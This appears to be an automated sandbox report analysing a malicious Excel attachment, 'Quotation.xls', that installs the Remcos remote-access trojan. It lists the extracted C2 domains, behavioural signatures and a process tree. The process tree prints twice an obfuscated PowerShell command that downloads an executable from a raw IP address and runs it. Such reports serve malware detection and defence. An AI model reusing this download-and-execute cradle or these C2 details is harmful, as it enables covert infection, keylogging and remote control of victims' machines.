Analysis
-
max time kernel
148s -
max time network
155s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
24-07-2024 10:30
Static task
static1
Behavioral task
behavioral1
Sample
Quotation.xls
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
Quotation.xls
Resource
win10v2004-20240709-en
General
-
Target
Quotation.xls
-
Size
1.0MB
-
MD5
7a9a6e2a484c942e9247513bf8420f13
-
SHA1
9a0399a2c75537687cdcaa939adb4a871b56f26e
-
SHA256
c0484101a8ad9d96190d39f100d6a6ed337873df68eb587c74a91b5cdd19cdd5
-
SHA512
a48ad2da1dddb561a8a64414a8576e03180dccc65cedb94e4733c1d7dba3f8881230d6ec7bb10fe495e13e5fc7449585f52921f9d05d3d1f41361e0b99ec3d2c
-
SSDEEP
24576:QCvOsc3umX8S4lMiK4uwQP6DdRgLd5+HKtGboP:QCG2xRISDdRgLQu
Malware Config
Extracted
remcos
2556
bossnacarpet.com:2556
vegetachcnc.com:2556
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
chrome-6W1HCC
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 8 2904 mshta.exe 9 2904 mshta.exe 11 2760 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 2760 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1108 winiti.exe -
Loads dropped DLL 1 IoCs
pid Process 2760 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1108 set thread context of 2884 1108 winiti.exe 41 -
Detected phishing page
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1356 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2760 powershell.exe 2760 powershell.exe 2760 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2760 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 1356 EXCEL.EXE 1356 EXCEL.EXE 1356 EXCEL.EXE 1356 EXCEL.EXE 1356 EXCEL.EXE 1356 EXCEL.EXE 1356 EXCEL.EXE -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 2904 wrote to memory of 2608 2904 mshta.exe 32 PID 2904 wrote to memory of 2608 2904 mshta.exe 32 PID 2904 wrote to memory of 2608 2904 mshta.exe 32 PID 2904 wrote to memory of 2608 2904 mshta.exe 32 PID 2608 wrote to memory of 2760 2608 cmd.exe 34 PID 2608 wrote to memory of 2760 2608 cmd.exe 34 PID 2608 wrote to memory of 2760 2608 cmd.exe 34 PID 2608 wrote to memory of 2760 2608 cmd.exe 34 PID 2760 wrote to memory of 1652 2760 powershell.exe 35 PID 2760 wrote to memory of 1652 2760 powershell.exe 35 PID 2760 wrote to memory of 1652 2760 powershell.exe 35 PID 2760 wrote to memory of 1652 2760 powershell.exe 35 PID 1652 wrote to memory of 2232 1652 csc.exe 36 PID 1652 wrote to memory of 2232 1652 csc.exe 36 PID 1652 wrote to memory of 2232 1652 csc.exe 36 PID 1652 wrote to memory of 2232 1652 csc.exe 36 PID 2760 wrote to memory of 1108 2760 powershell.exe 39 PID 2760 wrote to memory of 1108 2760 powershell.exe 39 PID 2760 wrote to memory of 1108 2760 powershell.exe 39 PID 2760 wrote to memory of 1108 2760 powershell.exe 39 PID 1108 wrote to memory of 2884 1108 winiti.exe 41 PID 1108 wrote to memory of 2884 1108 winiti.exe 41 PID 1108 wrote to memory of 2884 1108 winiti.exe 41 PID 1108 wrote to memory of 2884 1108 winiti.exe 41 PID 1108 wrote to memory of 2884 1108 winiti.exe 41 PID 1108 wrote to memory of 2884 1108 winiti.exe 41 PID 1108 wrote to memory of 2884 1108 winiti.exe 41 PID 1108 wrote to memory of 2884 1108 winiti.exe 41 PID 1108 wrote to memory of 2884 1108 winiti.exe 41 PID 1108 wrote to memory of 2884 1108 winiti.exe 41 PID 1108 wrote to memory of 2884 1108 winiti.exe 41 PID 1108 wrote to memory of 2884 1108 winiti.exe 41 PID 1108 wrote to memory of 2884 1108 winiti.exe 41 PID 1108 wrote to memory of 2884 1108 winiti.exe 41 PID 1108 wrote to memory of 2884 1108 winiti.exe 41 PID 1108 wrote to memory of 2884 1108 winiti.exe 41
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Quotation.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1356
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2904 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'JDVYWE5WZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRVJERUZpbml0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdLbU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFljSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1FpSEtBVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtGWmN1cW5tYWNILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYU3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeVVjSHZ3QnF1TWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNVhYTlZlOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDIzMDdXL2NzcnNzLmV4ZSIsIiRFTlY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1NUYXJULVNMZUVwKDMpO3NUQXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcd2luaXRpLmV4ZSI='+[chAR]0x22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'JDVYWE5WZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRVJERUZpbml0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdLbU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFljSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1FpSEtBVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtGWmN1cW5tYWNILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYU3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeVVjSHZ3QnF1TWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNVhYTlZlOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDIzMDdXL2NzcnNzLmV4ZSIsIiRFTlY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1NUYXJULVNMZUVwKDMpO3NUQXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcd2luaXRpLmV4ZSI='+[chAR]0x22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2760 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wrr7nadr.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCF22.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCF12.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2232
-
-
-
C:\Users\Admin\AppData\Roaming\winiti.exe"C:\Users\Admin\AppData\Roaming\winiti.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1108 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"5⤵
- System Location Discovery: System Language Discovery
PID:2884
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NFAY0EOS\gdfc[1].hta
Filesize8KB
MD55c8152c47be9ca7a398a85d2e51b2505
SHA134eeba07fe8667b81f14be825223b26006d7d042
SHA256ec3c6a6050bd2e48b86fa5c770b78963ed6f13f5adbd9e96ce86dd81e27ab3cd
SHA5128f4cf39c381f68cb3fe3230823b7a96d2808bae4ec3e44c7a2bd90946264da74736fae170cc0f471049b6e4d5ea9b9518f45a078a191ba401ad7b6d8321bae4a
-
Filesize
1KB
MD535c7d65fd3c27e01c9579b744902459c
SHA136491adf9dccab029e8da529632e88fe6d9fab55
SHA2567b1d94b818cd392846cff1ce027e9fdc66430ef99ee4dbad38f77ab8472dd957
SHA51228cc5a69bb7fca63d1b3de271716ef54affe377712cffd878ae14ed1184c2b7fb60ed514de134f1f753bf734cfb0e9f2dfd9930b6868b74d69c46edd0cef844a
-
Filesize
3KB
MD5930f55e4011c2193939d376948c305ad
SHA106464223e8a3f1074a858d66f5308c9115639691
SHA256077694a40703c99a0abc8f1dd04de38912a09c4e9a8e937f6c07cf1b221ffcec
SHA512e78f11bf5a8b4a4124769fed5c2f5cfc2b1506412fd9e5f40bb4ef6b1bec7c9522f8cf84a739171b42031e3ec10edfa6ae2b97f8194aa6554ef9de7fdd9056c1
-
Filesize
7KB
MD5d861d056a5c35a467b54b45eec5b3f39
SHA1e4e34e26d1800c8b57cffe70c8a3150c29c62162
SHA2565ea37039bff6e70ee7d2db0a8e996bd571b3246d6e4e8da21abb3f641921e4a1
SHA5120fc597035a4ccd1c893c5ca30cc3254e0639acfe60e2159128ce68e5cb4942fc2f9d65fda27072d2739e840999ef47e644437868b120c570a398903d87d3dbe4
-
Filesize
2.2MB
MD5f6bf8ada032d17192526ffebb48aed79
SHA1362cb802e430115288638c9d613f00412f1b2519
SHA256153e11471f85de3df5135b0445014698333ff40a9d6c488d291d6517eb19800d
SHA5120a2e5dbcc972d8463a3cd0608bb837e232ed1dd909ea7472ade269abb0ae1d9dfbeecefe505caffabefed02af413ee156aa2917f0ac3547f1431183bfa99639c
-
Filesize
652B
MD503a5865dc15c5d0f43ced1aee7a8d16e
SHA181458a58ad5a09f87c5d7b15e4c02dd7a5166555
SHA256be1ac8c1b9aebfbe284e5ecd496a0b3322dddd159517c2d7c34770d179ba269f
SHA512a74181241d37ac5c91766c1122c89cb9bd2e12c24f977fa90ff57b7e5f5fe1f127f8f7182fdd8eee6a3466232dfcec16a68e152c0ef18c15ca265ff8b3fdb428
-
Filesize
461B
MD5a83dc0e46bbad233951be9e3fdba130c
SHA1892cfc6827bb1072ec2e26bbf83457497d6a17cb
SHA256aa9a30262c1a7f73a50a10094b1c5eef9584cd05d275b2ed57430b3431aef967
SHA512e02ef7f32d36925b4064b283c5dfe49b2db6fe0df092be7e3e4b3ba6501b840f4d7d86732f63dc4564514e8aef810edc40b42c982b9fb8356b2e5ab6fe580caa
-
Filesize
309B
MD5b747cdd0ffea5c8ddf7131e17823747f
SHA141a278eddce8b4771d5b42be18cac33331d2d792
SHA256d6caa87edcd6c6751870a20178feeae84a47f104537deb1d22571441a9ae16cf
SHA512826600fa32ebd9e6fdff00288c2ab0805dd38dc604b4d8835bf148da66711daa7ab5468f92c4b91b39b65f88d1396d65d9d9fcf70703e0de89ff4029dff807a1